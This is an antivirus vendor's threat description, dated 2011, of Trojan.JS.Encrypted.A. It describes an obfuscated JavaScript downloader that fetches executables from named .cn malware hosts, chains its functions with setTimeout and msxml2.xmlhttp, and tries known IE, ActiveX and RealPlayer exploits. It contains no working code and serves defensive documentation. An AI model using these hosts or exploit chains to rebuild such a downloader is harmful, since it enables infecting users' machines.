Home / malware Trojan.JS.Encrypted.A
First posted on 21 November 2011.
Source: BitDefenderAliases :
There are no other names known for Trojan.JS.Encrypted.A.
Explanation :
LI.workaround { PADDING-LEFT: 10px; MARGIN: 0px; LIST-STYLE-TYPE: disc; TEXT-ALIGN: left } The Javascript has more layers of encrypted data and downloads other pieces of malware.
It tries different approaches on how to download a malicious file.
The downloads occur from the following sites : http://fconnorlaw.cn , http://biztech-co.cn or http://ratedhot.cn or http://pacoast.cn ( most of which are former sites for hosting malware such as Trojan.Peed ). It saves the file on this path : ".//..//[random_name].exe" and executes it on the infected computer.
The interesting thing about the flow of this script is that it has a thorough chain of execution :
It has a few layers of encrypting and of course obfuscation of code ( name of variables, indentation )After decoding, you can see a clear and simple pattern : one of the resulting scripts starts with the call to the main function called "startCrControlRange" and every function ends with the following code : setTimeout([next function in flow], 2000); - this means that the next function will be executed 2 seconds after the current one ends. The other script has a simple download using "msxml2.xmlhttp" from the mentioned sites.
It uses an exploit so that encrypted shellcode is executed. The shellcode used by the exploit is 0x1BB in length and it downloads a file from one of the infected sites.It tries one of these exploits in order to execute its malware shellcode
"Microsoft Internet Explorer WebViewFolderIcon setSlice()" exploit"NCTAudioFile2 ActiveX control" creating a buffer overflow trough the "SetFormatLikeSample" functionExploit for RealPlayer using the console property.Last update 21 November 2011
